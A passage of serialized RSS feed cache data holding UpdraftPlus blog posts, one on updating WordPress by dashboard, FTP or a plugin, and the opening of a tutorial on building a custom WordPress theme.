WordPress.</a></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:89:\"https://updraftplus.com/wordpress-caching-guide-how-does-it-improve-your-site-speed/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:84:\"https://updraftplus.com/wordpress-caching-guide-how-does-it-improve-your-site-speed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:4;a:6:{s:4:\"data\";s:88:\"\n		\n		\n					\n		\n		\n		\n				\n		\n		\n		\n		\n		\n		\n\n					\n										\n					\n					\n			\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:6:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:58:\"How to update your site to the latest version of WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:58:\"http://feedproxy.google.com/~r/UpdraftPlus/~3/bBuHhkoiWnM/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:91:\"https://updraftplus.com/how-to-update-your-site-to-the-latest-version-of-wordpress/#respond\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 13 Aug 2021 13:59:46 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:6:{i:0;a:5:{s:4:\"data\";s:15:\"Tips and tricks\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:5:\"guide\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:6:\"How to\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:3;a:5:{s:4:\"data\";s:14:\"latest version\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:4;a:5:{s:4:\"data\";s:6:\"update\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:5;a:5:{s:4:\"data\";s:9:\"wordpress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"https://updraftplus.com/?p=1200580\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:769:\"<p>If you have a WordPress website, you will know that it should always be run on the latest version of WordPress as the updated version of the software provides better performance and security. In this blog, we will discuss all &#8230; <a href=\"https://updraftplus.com/how-to-update-your-site-to-the-latest-version-of-wordpress/\">Continue reading <span class=\"meta-nav\">&#8594;</span></a></p>\n<p>The post <a rel=\"nofollow\" href=\"https://updraftplus.com/how-to-update-your-site-to-the-latest-version-of-wordpress/\">How to update your site to the latest version of WordPress</a> appeared first on <a rel=\"nofollow\" href=\"https://updraftplus.com\">UpdraftPlus</a>. <a href=\"http://updraftplus.com\">UpdraftPlus - Backup, restore and migration plugin for WordPress.</a></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"Sajid Sayyad\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:16644:\"<p><iframe loading=\"lazy\" title=\"How to update your site to the latest version of WordPress\" width=\"1080\" height=\"608\" src=\"https://www.youtube.com/embed/dbyzxgLzUbo?feature=oembed\"  allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe></p>\n<p><span style=\"font-weight: 400;\">If you have a WordPress website, you will know that it should always be run on the latest version of WordPress as the updated version of the software provides better performance and security.</span></p>\n<p><span style=\"font-weight: 400;\">In this blog, we will discuss all the ways you can update your website to the latest version of WordPress. We will go through the process on how to download the latest WordPress version and update it manually and also show you how to automate your WordPress updates &#8211; which can be highly beneficial, as it can save you a lot of time and effort.</span></p>\n<p><b>Why you should always use the latest version of WordPress</b></p>\n<p><span style=\"font-weight: 400;\">WordPress is an extremely popular and open source software platform. This means everyone can study the code, as it is available publicly as open source. This allows developers to analyze, improve and contribute to the WordPress codebase. Whenever a developer finds any bugs or security issues, it is reported to the WordPress software team, who then fix the issue and release a new WordPress update, with all the issues hopefully fixed. This approach to problem analysis/solving has largely been the reason why WordPress has managed to grow so rapidly.</span></p>\n<p><span style=\"font-weight: 400;\">However, the web is not  populated only by people with good intentions. There are entire cottage industries in operation that exist to employ hackers to actively look for vulnerabilities and loopholes in the source code. As it powers over a third of all the websites in the world, WordPress is a hugely popular target and often top of the list for hackers. If a vulnerability is found in an older version of WordPress, hackers will attack these sites and steal all valuable data (such as emails, billing information etc).</span></p>\n<p><span style=\"font-weight: 400;\">Apart from security fixes, users of WordPress will also get access to new features and better performances when they download the latest version of WordPress. For example, the latest WordPress 5.8 version has introduced a few new features that you can read in the </span><a href=\"https://wordpress.org/news/2021/07/tatum\"><span style=\"font-weight: 400;\">release documentation</span></a><span style=\"font-weight: 400;\">.</span></p>\n<p><span style=\"font-weight: 400;\">Now you are aware and understand the need to upgrade WordPress, let’s take a detailed look at how to perform the upgrade. </span></p>\n<p><b>Things to do before upgrading WordPress</b></p>\n<p><span style=\"font-weight: 400;\">Whenever you plan to update the software, remember to always take a backup of the current site with </span><a href=\"https://updraftplus.com/\"><span style=\"font-weight: 400;\">UpdraftPlus</span></a><span style=\"font-weight: 400;\">. By doing this, you will be able to restore the site immediately if the new updates result in unexpected issues and break your website. It is recommended that you store your backup in a remote storage location (such as Google Drive), so you will always have access to it; even if an upgrade causes an issue with your server.</span></p>\n<p><span style=\"font-weight: 400;\">For extra safety and security, you can also use <a href=\"https://updraftplus.com/updraftclone/\">UpdraftClone</a> to create an identical copy of your site and test out any update on, further removing any potential risks as UpdraftClone allows you to create a cloned test site of your live site instantly and directly from UpdraftPlus. Once you have created a clone of your site, you can carry out updates and tests, safe in the knowledge that your live site is completely safe from any potential issues. </span></p>\n<p><span style=\"font-weight: 400;\">When it comes to WordPress backup, UpdraftPlus is the number one choice of users. At the time of writing this article, it is being used on over 3 million websites. Follow our guide: </span><a href=\"https://updraftplus.com/how-to-backup-a-wordpress-site-step-by-step-guide\"><span style=\"font-weight: 400;\">How to Backup a WordPress Site: Step by Step Guide</span></a><span style=\"font-weight: 400;\"> for instruction on how to backup your site before updating WordPress.</span></p>\n<p><span style=\"font-weight: 400;\">Once you have your website backed-up, remember to choose the right time to schedule your upgrade. Updating WordPress usually only takes a minute or two, but in certain situations it may take longer than expected. During this process, it is important to remember that customers/visitors to your site should not face any unexpected behavior or access issues. To avoid this, it is best to pick a time when you typically have less users active on the site.</span></p>\n<p><b>Manually upgrading WordPress to the latest version</b></p>\n<p><span style=\"font-weight: 400;\">WordPress regularly releases updates with both major and minor releases. Minor releases are typically reserved for security and bug fixes. Since WordPress 3.7 or above, automatic updates are turned on for minor releases. This means you do not need to upgrade it manually as WordPress handles these minor updates on it’s own.</span></p>\n<p><span style=\"font-weight: 400;\">When it comes to major releases, there are 2 options available to upgrade to the latest version &#8211; automatic (via a press of button) or manual. </span></p>\n<p><b>Upgrading WordPress from the Dashboard</b></p>\n<p><span style=\"font-weight: 400;\">This is a straightforward and easy to follow process. All you need to do is press on the “Update now” button and the upgrade will start automatically. It can be done in a few moments.</span></p>\n<p><span style=\"font-weight: 400;\">To access this option, go to </span><b>Dashboard-&gt;Updates</b><span style=\"font-weight: 400;\"> page in your WordPress site. You will see the ‘Update now’ button as shown below.</span></p>\n<p><a href=\"https://updraftplus.com/wp-content/uploads/2021/08/unnamed-4.png\"><img loading=\"lazy\" class=\"alignnone wp-image-1200607\" src=\"https://updraftplus.com/wp-content/uploads/2021/08/unnamed-4.png\" alt=\"\" width=\"581\" height=\"135\" srcset=\"https://updraftplus.com/wp-content/uploads/2021/08/unnamed-4.png 581w, https://updraftplus.com/wp-content/uploads/2021/08/unnamed-4-480x112.png 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 581px, 100vw\" /></a></p>\n<p><span style=\"font-weight: 400;\">In the screenshot, you will see that it states that your site will be in maintenance mode until the updates are complete. As previously mentioned, this is the reason for picking the “low visitor” hours when carrying out your upgrade.</span></p>\n<p><span style=\"font-weight: 400;\">Press the ‘Update now’ button and WordPress initiates the upgrading process for you. It may take a couple of minutes.</span></p>\n<p><span style=\"font-weight: 400;\">Once WordPress has installed the updates, you should be redirected to a page where you can see a list of new features available in the latest update.</span></p>\n<p><span style=\"font-weight: 400;\">There may be some cases where this process is not possible. If this is the case, you can follow the below update process instead.</span></p>\n<p><b>Upgrade WordPress using FTP Client</b></p>\n<p><span style=\"font-weight: 400;\">In order to update WordPress manually to the latest version, you will need to perform the following steps.</span></p>\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Download the </span><a href=\"https://wordpress.org/download\"><span style=\"font-weight: 400;\">latest WordPress</span></a><span style=\"font-weight: 400;\"> zip.</span></li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Extract the zip.</span></li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Connect your site with an FTP client (</span><a href=\"https://filezilla-project.org\"><span style=\"font-weight: 400;\">FileZilla</span></a><span style=\"font-weight: 400;\"> is a popular FTP Client).</span></li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Upload </span><i><span style=\"font-weight: 400;\">wp-admin</span></i><span style=\"font-weight: 400;\">, </span><i><span style=\"font-weight: 400;\">wp-includes</span></i><span style=\"font-weight: 400;\"> directories (from the extracted zip) on your site, replacing older versions.</span></li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Upload all core files from the root directory of extracted zip. Remember not to change the </span><i><span style=\"font-weight: 400;\">wp-config.php</span></i><span style=\"font-weight: 400;\"> file.</span></li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Upload </span><i><span style=\"font-weight: 400;\">wp-content/index.php. </span></i></li>\n</ul>\n<p><a href=\"https://updraftplus.com/wp-content/uploads/2021/08/unnamed-1.png\"><img loading=\"lazy\" class=\"alignnone wp-image-1200610\" src=\"https://updraftplus.com/wp-content/uploads/2021/08/unnamed-1.png\" alt=\"\" width=\"674\" height=\"225\" srcset=\"https://updraftplus.com/wp-content/uploads/2021/08/unnamed-1.png 674w, https://updraftplus.com/wp-content/uploads/2021/08/unnamed-1-480x160.png 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 674px, 100vw\" /></a></p>\n<p><span style=\"font-weight: 400;\">WordPress writes the code for core functionalities and new features in the </span><i><span style=\"font-weight: 400;\">wp-admin</span></i><span style=\"font-weight: 400;\"> and </span><i><span style=\"font-weight: 400;\">wp-includes</span></i><span style=\"font-weight: 400;\"> folders. The files in the root directory also contain the code for new updates. While updating WordPress, we need to only replace these files and folders. When developing your WordPress websites, remember not to touch these files &#8211; at any cost, as it can break the system. These files are part of the core development and must remain untouched.</span></p>\n<p><span style=\"font-weight: 400;\">Once you are done with the manual process, go to the admin area of your site. Sometimes you need to update your database for the new version. You may see the below notice asking to update your WordPress database.</span></p>\n<p><a href=\"https://updraftplus.com/wp-content/uploads/2021/08/New-Project-2021-08-13T143207.396.jpg\"><img loading=\"lazy\" class=\"alignnone size-full wp-image-1200616\" src=\"https://updraftplus.com/wp-content/uploads/2021/08/New-Project-2021-08-13T143207.396.jpg\" alt=\"\" width=\"607\" height=\"306\" srcset=\"https://updraftplus.com/wp-content/uploads/2021/08/New-Project-2021-08-13T143207.396.jpg 607w, https://updraftplus.com/wp-content/uploads/2021/08/New-Project-2021-08-13T143207.396-480x242.jpg 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 607px, 100vw\" /></a></p>\n<p><span style=\"font-weight: 400;\">If you come across this notice, just press the ‘Update WordPress Database’ button.</span></p>\n<p><span style=\"font-weight: 400;\">After this, login to your admin area &#8211; you should now see you have successfully updated to the latest version of WordPress.</span></p>\n<p><span style=\"font-weight: 400;\">It is important to carry out due diligence on your site after an update. Browse your site and make sure everything is in the right place and is working correctly. Most of the time, WordPress updates will not cause any issues if you are using the system correctly and carried out the update in the proper manner. However, if you are experiencing unpredictable behaviour, you can quickly restore your site to the older working version using your UpdraftPlus backup.</span></p>\n<p><span style=\"font-weight: 400;\">You can also save further time by automating the WordPress updates process using the </span><a href=\"https://easyupdatesmanager.com\"><span style=\"font-weight: 400;\">Easy Update Manager</span></a><span style=\"font-weight: 400;\"> plugin.</span></p>\n<p><b>Manage automatic WordPress updates</b></p>\n<p><span style=\"font-weight: 400;\">The </span><a href=\"https://easyupdatesmanager.com/\"><span style=\"font-weight: 400;\">Easy Update Manager</span></a><span style=\"font-weight: 400;\"> plugin is built by the same team that brings you UpdraftPlus. At the time of writing, Easy Updates Manager has 300K+ active installations. By using this plugin, you can automate WordPress, plugin and theme updates. </span></p>\n<p><span style=\"font-weight: 400;\">Users can also use a </span><a href=\"https://wordpress.org/plugins/stops-core-theme-and-plugin-updates\"><span style=\"font-weight: 400;\">free version</span></a><span style=\"font-weight: 400;\"> of the plugin with a limited set of features. However, it is suggested that you install the Premium version, as it contains many handy features that can make updating easier and quicker. These include:</span></p>\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Safe Update &#8211; Block automatic updates if the update states a minimum PHP or WP version requirement that is not met by the site/server.</span></li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Schedule Updates. Customize your update schedule to minimize any downtime.</span></li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Auto-update protection. If something goes wrong during an auto-update, the plugin will alert you via email and then try to fix it automatically.</span></li>\n</ul>\n<p><span style=\"font-weight: 400;\">Upon installation, you can find the settings under the </span><b>Dashboard-&gt;Updates options</b><span style=\"font-weight: 400;\">. On this page, you will see the different options to manage WordPress, plugin and theme updates. Under the ‘WordPress core updates’, press the ‘Auto update all releases’ button. </span></p>\n<p><span style=\"font-weight: 400;\">Add your email address under ‘Core notification emails’. You will now receive an email at this address when your site updates.</span></p>\n<p><a href=\"https://updraftplus.com/wp-content/uploads/2021/08/unnamed-2-1.png\"><img loading=\"lazy\" class=\"alignnone wp-image-1200617\" src=\"https://updraftplus.com/wp-content/uploads/2021/08/unnamed-2-1.png\" alt=\"\" width=\"651\" height=\"150\" srcset=\"https://updraftplus.com/wp-content/uploads/2021/08/unnamed-2-1.png 651w, https://updraftplus.com/wp-content/uploads/2021/08/unnamed-2-1-480x111.png 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 651px, 100vw\" /></a></p>\n<p><span style=\"font-weight: 400;\">When using the premium version of the plugin, you can set your updates to suit your schedule. As previously discussed, if you wanted to update WordPress and pick a time when your site had less visitors, go to the ‘Advanced’ tab and set your preferred schedule time under ‘Automatic update scheduling’.</span></p>\n<p><a href=\"https://updraftplus.com/wp-content/uploads/2021/08/unnamed-3.png\"><img loading=\"lazy\" class=\"alignnone wp-image-1200608\" src=\"https://updraftplus.com/wp-content/uploads/2021/08/unnamed-3.png\" alt=\"\" width=\"670\" height=\"229\" srcset=\"https://updraftplus.com/wp-content/uploads/2021/08/unnamed-3.png 670w, https://updraftplus.com/wp-content/uploads/2021/08/unnamed-3-480x164.png 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 670px, 100vw\" /></a></p>\n<p><span style=\"font-weight: 400;\">These are the basic settings required to automate your WordPress updates. Now you can just sit back and relax and let the plugin handle all the upgrading stuff for you.</span></p>\n<p><b>Conclusion</b></p>\n<p><span style=\"font-weight: 400;\">We have run through both the automatic and manual processes for upgrading to the latest version of WordPress. The user can use either process in order to help keep your site safe from hackers. Remember to always take a backup before updating using UpdraftPlus!</span></p>\n<p>The post <a rel=\"nofollow\" href=\"https://updraftplus.com/how-to-update-your-site-to-the-latest-version-of-wordpress/\">How to update your site to the latest version of WordPress</a> appeared first on <a rel=\"nofollow\" href=\"https://updraftplus.com\">UpdraftPlus</a>. <a href=\"http://updraftplus.com\">UpdraftPlus - Backup, restore and migration plugin for WordPress.</a></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:88:\"https://updraftplus.com/how-to-update-your-site-to-the-latest-version-of-wordpress/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:83:\"https://updraftplus.com/how-to-update-your-site-to-the-latest-version-of-wordpress/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:5;a:6:{s:4:\"data\";s:88:\"\n		\n		\n					\n		\n		\n		\n				\n		\n		\n		\n		\n		\n		\n\n					\n										\n					\n					\n			\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:6:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:38:\"How to create a WordPress custom theme\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:58:\"http://feedproxy.google.com/~r/UpdraftPlus/~3/VoA1IAJMujo/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:71:\"https://updraftplus.com/how-to-create-a-wordpress-custom-theme/#respond\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 06 Aug 2021 12:57:44 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:6:{i:0;a:5:{s:4:\"data\";s:20:\"Other WordPress news\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:15:\"Tips and tricks\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:6:\"Create\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:3;a:5:{s:4:\"data\";s:12:\"custom theme\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:4;a:5:{s:4:\"data\";s:6:\"How to\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:5;a:5:{s:4:\"data\";s:9:\"wordpress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"https://updraftplus.com/?p=1194438\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:722:\"<p>WordPress occupies a huge percentage of the world’s websites, making up 37% of all sites currently online. While there are many reasons and factors for this success, one of the main reasons is the popularity of features available to all &#8230; <a href=\"https://updraftplus.com/how-to-create-a-wordpress-custom-theme/\">Continue reading <span class=\"meta-nav\">&#8594;</span></a></p>\n<p>The post <a rel=\"nofollow\" href=\"https://updraftplus.com/how-to-create-a-wordpress-custom-theme/\">How to create a WordPress custom theme</a> appeared first on <a rel=\"nofollow\" href=\"https://updraftplus.com\">UpdraftPlus</a>. <a href=\"http://updraftplus.com\">UpdraftPlus - Backup, restore and migration plugin for WordPress.</a></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"Sajid Sayyad\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:23273:\"<p><iframe loading=\"lazy\" title=\"How to Create a WordPress Custom Theme\" width=\"1080\" height=\"608\" src=\"https://www.youtube.com/embed/U_ZJHFwvKtY?feature=oembed\"  allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe></p>\n<p><span style=\"font-weight: 400;\">WordPress occupies a huge percentage of the world’s websites, making up </span><a href=\"https://www.envisagedigital.co.uk/wordpress-market-share/#:~:text=WordPress%20powers%2037%25%20of%20all%20websites%20and%2062%25%20of%20CMS,top%20100%E2%80%94websites%20in%202021.\"><span style=\"font-weight: 400;\">37% of all sites</span></a><span style=\"font-weight: 400;\"> currently online. While there are many reasons and factors for this success, one of the main reasons is the popularity of features available to all users. Plugins, themes, posts, pages, categories, taxonomies, user roles and media handling just to name a few. To get the most out of WordPress, it is recommended users study and learn how to use all of these features. In this blog, we will focus on and discuss WordPress Themes and will walk you through the basics required on how to create a WordPress custom theme.</span></p>\n<h4><b>What is a custom theme?</b></h4>\n<p><span style=\"font-weight: 400;\">Everything on the frontend of your site is being run from and controlled using something called a ‘theme’. A website’s theme is responsible for the specific design and functionality of the website. You can check out the </span><a href=\"https://wordpress.org/themes\"><span style=\"font-weight: 400;\">WordPress theme repository</span></a><span style=\"font-weight: 400;\"> or </span><a href=\"https://themeforest.net/category/wordpress\"><span style=\"font-weight: 400;\">Themeforest</span></a><span style=\"font-weight: 400;\"> for theme examples; here you will find thousands of themes listed for you to explore and download.</span></p>\n<p><span style=\"font-weight: 400;\">While established WordPress themes are great, if you have the ability and need, you may also want to build your own custom theme for a client, for yourself, or to submit to the marketplaces with the intention of selling it. When creating a commercial theme, you will need to follow the marketplaces guidelines for coding standards, structure of files and folders, etc. You can find more details regarding these guidelines on the </span><a href=\"https://www.templatemonster.com/blog/sell-wordpress-themes/\"><span style=\"font-weight: 400;\">marketplaces websites</span></a><span style=\"font-weight: 400;\">. </span></p>\n<p><span style=\"font-weight: 400;\">In this blog, we will run through a tutorial to show you a basic overview on how to create your very own WordPress theme by covering all the basics and steps associated with the process. </span></p>\n<p><b>Create a WordPress custom theme</b></p>\n<p><span style=\"font-weight: 400;\">WordPress themes are built with template files, scripts, styles, images, etc. To proceed, you should have working knowledge of PHP, HTML and CSS, which are required to build a custom theme. Understanding JavaScript can also be an additional advantage.</span></p>\n<p><span style=\"font-weight: 400;\">To get started, we will first name the theme ‘Updraft’. Create a folder called ‘Updraft’ inside </span><i><span style=\"font-weight: 400;\">wp-content/themes</span></i><span style=\"font-weight: 400;\">. Within this ‘Updraft’ folder, you will write your theme related code, store files, images, fonts, etc. </span></p>\n<p><span style=\"font-weight: 400;\">The main files of the custom WordPress theme are:</span></p>\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">style.css</span></li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">index.php</span></li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">functions.php</span></li>\n</ul>\n<p><span style=\"font-weight: 400;\">The </span><i><span style=\"font-weight: 400;\">style.css </span></i><span style=\"font-weight: 400;\">will be the main stylesheet file and you can add all of your CSS in this file. Remember that you must include an information header about the theme. The header should look similar to the below format and be on the top of </span><i><span style=\"font-weight: 400;\">style.css.</span></i></p>\n<pre style=\"background: #efefef;\"><code>/* \nTheme Name: Updraft \nTheme URI: https://updraftplus.com \nAuthor: UpdraftPlus \nAuthor URI: https://updraftplus.com \nDescription: The custom theme built for the website. \nVersion: 1.0 \nLicense: GNU General Public License v2 or later \nLicense URI: http://www.gnu.org/licenses/gpl-2.0.html \nText Domain: updraft \n*/ \n</code></pre>\n<pre></pre>\n<p><span style=\"font-weight: 400;\">Next, go to the </span><b>Appearance &gt;&gt;Themes, </b><span style=\"font-weight: 400;\">where you will see your theme listed. Activate it. When you check the frontend of your site, it will show a blank screen &#8211; as we have not added anything to the theme yet..</span></p>\n<p><span style=\"font-weight: 400;\">Remember to store your images, scripts and styles into your theme directory. The theme directory refers to the ‘wp-content/themes/Updraft’ folder. Be sure to keep them organized by using a good folder structure, creating specific folders for images, scripts and styles; Copy the files into the respective directory.</span></p>\n<h4><b>Functions File</b></h4>\n<p><span style=\"font-weight: 400;\">The </span><i><span style=\"font-weight: 400;\">functions.php </span></i><span style=\"font-weight: 400;\">is the file where you can add code for different purposes. This file is automatically loaded during WordPress initialization, with the code written in it executed automatically.</span></p>\n<p><span style=\"font-weight: 400;\">The following operations in the </span><i><span style=\"font-weight: 400;\">functions.php</span></i><span style=\"font-weight: 400;\"> file are usually carried out in this order:</span></p>\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Enqueue theme stylesheets and scripts (add the JS and CSS files to the website).</span></li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Enable Sidebars, Navigation Menus, Post Thumbnails, etc.</span></li>\n<li style=\"font-weight: 400;\" 